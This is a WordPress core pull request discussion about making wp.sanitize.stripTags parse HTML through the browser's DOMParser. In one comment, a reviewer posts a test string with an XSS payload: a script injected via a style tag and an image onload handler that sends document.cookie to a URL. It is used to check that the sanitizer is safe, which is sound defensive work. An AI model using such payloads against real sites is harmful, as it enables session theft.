wp.sanitize.stripTags could rely on the browser for HTML parsing - [Core - 64274] #10536
Conversation
|
The following accounts have interacted with this PR and/or linked issues. I will continue to update these lists as activity occurs. You can also manually ask me to refresh this list by adding the Core Committers: Use this line as a base for the props when committing in SVN: To understand the WordPress project's expectations around crediting contributors, please review the Contributor Attribution page in the Core Handbook. |
Test using WordPress PlaygroundThe changes in this pull request can previewed and tested using a WordPress Playground instance. WordPress Playground is an experimental project that creates a full WordPress instance entirely within the browser. Some things to be aware of
For more details about these limitations and more, check out the Limitations page in the WordPress Playground documentation. |
src/js/_enqueues/wp/sanitize.js
Outdated
| } while ( _text !== text ); | ||
| const htmlElement = document.createElement( 'div' ); | ||
| htmlElement.innerHTML = _text; | ||
| _text = htmlElement.textContent || htmlElement.innerText || ''; |
There was a problem hiding this comment.
@hbhalodia would you like to share about why you chose the logic of the fallback chain here?
I can think of a few cases where textContent may not be desirable without further processing.
Also, can the value ever not be a string? In which cases did you find the || '' necessary?
There was a problem hiding this comment.
I can think of a few cases where textContent may not be desirable without further processing.
Right. What would happen if someone put a SCRIPT tag inside of a STYLE tag?
There was a problem hiding this comment.
would you like to share about why you chose the logic of the fallback chain here?
Hi @dmsnell, I have used this because, sometimes the older browser may not have a textContent -- https://caniuse.com/?search=textContent, IE6-8 does not support it (I know they are not used anymore, but less probability that it may be used somewhere), though I can remove this, since we are also having some cleanup in codebase related to older browsers. Used just for defensive coding.
I can think of a few cases where textContent may not be desirable without further processing.
Then ultimately, we need to first identify what we need to achive here? Basic DOM parsing may not be something that should be the only thing. Also, if we need to further process it, why don't we use same logic we are currently using?
Also, if we need to use DOM Parsing, then ultimately we need to loop through again to identify all nodes and remove it or extract the text from all nodes.
There was a problem hiding this comment.
WordPress does not support IE anymore, so you can be free from adding this compatibility. See https://make.wordpress.org/core/handbook/best-practices/browser-support/
There was a problem hiding this comment.
I will confirm what @westonruter shared. defensive coding is appreciated, but we draw our line with the supported browsers, so attempting to support IE in this case goes beyond that towards introducing unexpected and unwanted behaviors.
Let’s standardize on .innerText, which I believe should attempt to faithfully represent the rendered content on the page. Please double-check, however, as I think in some cases it preserves spacing in ways we might not expect (e.g. PRE elements and elements with whitespace-preserving CSS).
The spacing issue isn’t defined and I don’t know if we need to handle it. It would just be nice if we could confirm the behavior and document it, as it will likely be surprising one way or the other.
There was a problem hiding this comment.
images in the parsed HTML will get loaded and inline event handlers get executed
🤯
but if we use DOMParser.parseFromString() then none of this happens? if so, I think we should be good to use .innerText and use that trick I mentioned, returning .innerHTML afterwards.
@hbhalodia let’s get .textContent out of the conversation. I do frequently confuse it with .innerText, but once we clear that up (we did) then we don’t need to deliberate any more — we don’t want non-renderable text to come through, such as SCRIPT element contents.
@westonruter if we go the route of removing things and using textContent we’re back in the zone of over-eagerly defining the conversion and (I think) losing the styling information, meaning we get all text instead of just rendered text.
this is complicated, as always.
There was a problem hiding this comment.
Yes, this does the trick:
const unsafeText = `Hello: <style style="display:block"><script>document.write('evil');</script></style><img src="https://s.w.org/style/images/about/WordPress-logotype-wmark.png" onload="fetch('https://wordpress.org/wp-json/?cookie=' + encodeURIComponent(document.cookie))">`;
/**
* Safely strips HTML tags from a string using DOMParser.
*
* @param {string} htmlString - The HTML string to strip.
* @returns {string} The text content with tags removed.
*/
function stripTags( htmlString ) {
const parser = new DOMParser();
const doc = parser.parseFromString( htmlString, 'text/html' );
doc.body.innerText = doc.body.innerText;
return doc.body.innerHTML;
}
console.log( stripTags( unsafeText ) );Output:
Hello: <script>document.write('evil');</script>
No image resource appears in the network log.
There was a problem hiding this comment.
now it’d be remiss if we didn’t return to where this started: @westonruter I believe you made a change to reduce memory usage, but this probably increases it, right? do we consider the additional reliability worth it? does that memory use matter in practice?
examining your change, that mostly turned recursion into iteration, so the memory impact was likely avoiding a stack overflow?
this is probably magnitudes faster given that it runs in the optimized C++ code.
There was a problem hiding this comment.
The original fix was to avoid theoretical memory and stack exhaustion in Core-48054. The performance impact of this was never demonstrated to be an actual problem experienced by users. So this alternate implementation seems fine. Better for something to be correct than to be slightly more efficient.
There was a problem hiding this comment.
Thanks for clarification and disucssion over multiple approaches. I am now updating the PR with the latest approach we discussed. Let me know once I update if there is something needs to be updated more on it.
Thank You,
3 participants
Trac ticket: https://core.trac.wordpress.org/ticket/64274
This Pull Request is for code review only. Please keep all other discussion in the Trac ticket. Do not merge this Pull Request. See GitHub Pull Requests for Code Review in the Core Handbook for more details.